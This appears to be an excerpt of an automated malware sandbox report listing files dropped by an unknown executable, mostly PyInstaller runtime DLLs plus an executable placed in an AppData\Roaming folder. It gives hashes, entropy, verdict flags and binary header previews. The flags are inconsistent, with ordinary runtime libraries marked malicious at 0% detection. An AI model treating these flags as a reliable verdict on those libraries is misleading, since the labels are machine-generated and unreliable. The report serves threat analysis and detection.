                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.08402114712403
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:29DWEhWXFQpBj0HRN7lbQHRN7s8SIlexeXC:kkqWN8L6cXC
                                                                                                                                                                                                                                                  MD5:D51BC845C4EFBFDBD68E8CCFFDAD7375
                                                                                                                                                                                                                                                  SHA1:C82E580EC68C48E613C63A4C2F9974BB59182CF6
                                                                                                                                                                                                                                                  SHA-256:89D9F54E6C9AE1CB8F914DA1A2993A20DE588C18F1AAF4D66EFB20C3A282C866
                                                                                                                                                                                                                                                  SHA-512:2E353CF58AD218C3E068A345D1DA6743F488789EF7C6B96492D48571DC64DF8A71AD2DB2E5976CFD04CF4B55455E99C70C7F32BD2C0F4A8BED1D29C2DAFC17B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......].....`.........................................`...e............ ...................A..............8............................................................................rdata..|...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):28952
                                                                                                                                                                                                                                                  Entropy (8bit):6.688687241998293
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:wZVacWM4Oe59Ckb1hgmLiWEhW1e9HQpBj0HRN7O2KQHRN7w3kclsHMkZT:wZVJWMq59Bb1jQuMHqWOz8Akx
                                                                                                                                                                                                                                                  MD5:487F72D0CF7DC1D85FA18788A1B46813
                                                                                                                                                                                                                                                  SHA1:0AABFF6D4EE9A2A56D40EE61E4591D4BA7D14C0D
                                                                                                                                                                                                                                                  SHA-256:560BAF1B87B692C284CCBB82F2458A688757231B315B6875482E08C8F5333B3D
                                                                                                                                                                                                                                                  SHA-512:B7F4E32F98BFDCF799331253FAEBB1FB08EC24F638D8526F02A6D9371C8490B27D03DB3412128CED6D2BBB11604247F3F22C8380B1BF2A11FB3BB92F18980185
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........,...............................................P.......%....`.........................................`....%...........@...............0...A..............8............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20760
                                                                                                                                                                                                                                                  Entropy (8bit):7.028263219925353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:JitIlWEhWO5oQpBj0HRN7BXVQHRN7DEp1x09lgezq:w6paqWz8Apsm
                                                                                                                                                                                                                                                  MD5:54A8FCA040976F2AAC779A344B275C80
                                                                                                                                                                                                                                                  SHA1:EA1F01D6DCDF688EB0F21A8CB8A38F03BC777883
                                                                                                                                                                                                                                                  SHA-256:7E90E7ACC69ACA4591CE421C302C7F6CDF8E44F3B4390F66EC43DFF456FFEA29
                                                                                                                                                                                                                                                  SHA-512:CB20BED4972E56F74DE1B7BC50DC1E27F2422DBB302AECB749018B9F88E3E4A67C9FC69BBBB8C4B21D49A530CC8266172E7D237650512AAFB293CDFE06D02228
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`...x............ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24344
                                                                                                                                                                                                                                                  Entropy (8bit):6.897926491070706
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:B42r77WEhWCFQpBj0HRN7SQHRN7oSIlexw40:B42r7DrqWS8o6x0
                                                                                                                                                                                                                                                  MD5:21B509D048418922B92985696710AFCA
                                                                                                                                                                                                                                                  SHA1:C499DD098AAB8C7E05B8B0FD55F994472D527203
                                                                                                                                                                                                                                                  SHA-256:FE7336D2FB3B13A00B5B4CE055A84F0957DAEFDACE94F21B88E692E54B678AC3
                                                                                                                                                                                                                                                  SHA-512:C517B02D4E94CF8360D98FD093BCA25E8AE303C1B4500CF4CF01F78A7D7EF5F581B99A0371F438C6805A0B3040A0E06994BA7B541213819BD07EC8C6251CB9BB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................@......~.....`.........................................`...4............0...................A..............8............................................................................rdata..H...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25880
                                                                                                                                                                                                                                                  Entropy (8bit):6.843889819511554
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:z3vAmiFVhFWEhWGqQpBj0HRN79XJQHRN7/SCMllJXq:zvYjoqW958/ga
                                                                                                                                                                                                                                                  MD5:120A5DC2682CD2A838E0FC0EFD45506E
                                                                                                                                                                                                                                                  SHA1:8710BE5D5E9C878669FF8B25B67FB2DEB32CD77A
                                                                                                                                                                                                                                                  SHA-256:C14F0D929A761A4505628C4EB5754D81B88AA1FDAD2154A2F2B0215B983B6D89
                                                                                                                                                                                                                                                  SHA-512:4330EDF9B84C541E5ED3BB672548F35EFA75C6B257C3215FC29BA6E152294820347517EC9BD6BDE38411EFA9074324A276CF0D7D905ED5DD88E906D78780760C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`...a............0...............$...A..............8............................................................................rdata..t...........................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25880
                                                                                                                                                                                                                                                  Entropy (8bit):6.8416401850774395
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:p5yguNvZ5VQgx3SbwA71IkFZpMHqW74W8Lipsy:p5yguNvZ5VQgx3SbwA71IipMR747fy
                                                                                                                                                                                                                                                  MD5:F22FACA49E4D5D80EC26ED31E7ECD0E0
                                                                                                                                                                                                                                                  SHA1:473BCBFB78E6A63AFD720B5CBE5C55D9495A3D88
                                                                                                                                                                                                                                                  SHA-256:1EB30EA95DAE91054A33A12B1C73601518D28E3746DB552D7CE120DA589D4CF4
                                                                                                                                                                                                                                                  SHA-512:C8090758435F02E3659D303211D78102C71754BA12B0A7E25083FD3529B3894DC3AB200B02A2899418CC6ED3B8F483D36E6C2BF86CE2A34E5FD9AD0483B73040
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." ......... ...............................................@............`.........................................`................0...............$...A..............8............................................................................rdata..............................@..@.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):22296
                                                                                                                                                                                                                                                  Entropy (8bit):6.97368865913958
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:SPEzaWEhW/slQpBj0HRN7sVQHRN7gkclsHTyt:Y0YRqWg8jyt
                                                                                                                                                                                                                                                  MD5:2FD0DA47811B8ED4A0ABDF9030419381
                                                                                                                                                                                                                                                  SHA1:46E3F21A9BD31013A804BA45DC90CC22331A60D1
                                                                                                                                                                                                                                                  SHA-256:DE81C4D37833380A1C71A5401DE3AB4FE1F8856FC40D46D0165719A81D7F3924
                                                                                                                                                                                                                                                  SHA-512:2E6F900628809BFD908590FE1EA38E0E36960235F9A6BBCCB73BBB95C71BFD10F75E1DF5E8CF93A682E4ADA962B06C278AFC9123AB5A4117F77D1686FF683D6F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20248
                                                                                                                                                                                                                                                  Entropy (8bit):7.0800725103781765
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                                                                                                  MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                                                                                                  SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                                                                                                  SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                                                                                                  SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......0....`.........................................`...^............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):841697
                                                                                                                                                                                                                                                  Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                                                  MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                                                  SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                                                  SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                                                  SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3381792
                                                                                                                                                                                                                                                  Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                                                  MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                                                  SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                                                  SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                                                  SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\libffi-7.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32792
                                                                                                                                                                                                                                                  Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                                                  MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                                                  SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                                                  SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                                                  SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\python38.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4183112
                                                                                                                                                                                                                                                  Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                                                  MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                                                  SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                                                  SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                                                  SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\select.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26696
                                                                                                                                                                                                                                                  Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                                                  MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                                                  SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                                                  SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                                                  SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\ucrtbase.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1046080
                                                                                                                                                                                                                                                  Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                                                  MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                                                  SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                                                  SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                                                  SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI26522\unicodedata.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1096264
                                                                                                                                                                                                                                                  Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                                                  MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                                                  SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                                                  SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                                                  SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                  Entropy (8bit):5.346287484304825
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:jduHBY6QtYnfd6unCuUe1v5NFWJKtEBHx5fyf9SdsPDhxWBtIBLAKhm38fARlQWy:jduH/v1v5NxffIdIfDBtfARl/
                                                                                                                                                                                                                                                  MD5:031377E4E34DCD19917FAC02FF6DA79F
                                                                                                                                                                                                                                                  SHA1:0FCCCFFEE83CBB77A87CA1B55ABC8E18FB267AFC
                                                                                                                                                                                                                                                  SHA-256:D58061A43DF6B63E97421904C066ED5AD4B87A3733C250E105E83BC7154D9414
                                                                                                                                                                                                                                                  SHA-512:F682A314A74DAD1269DC1D948DC0C4773EB08E76AB364C3D5A9893577395126E5A409FCA18CAB24378E95FA71B8D96E20AD22E644275DAF3F997EDF8592DA5C4
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
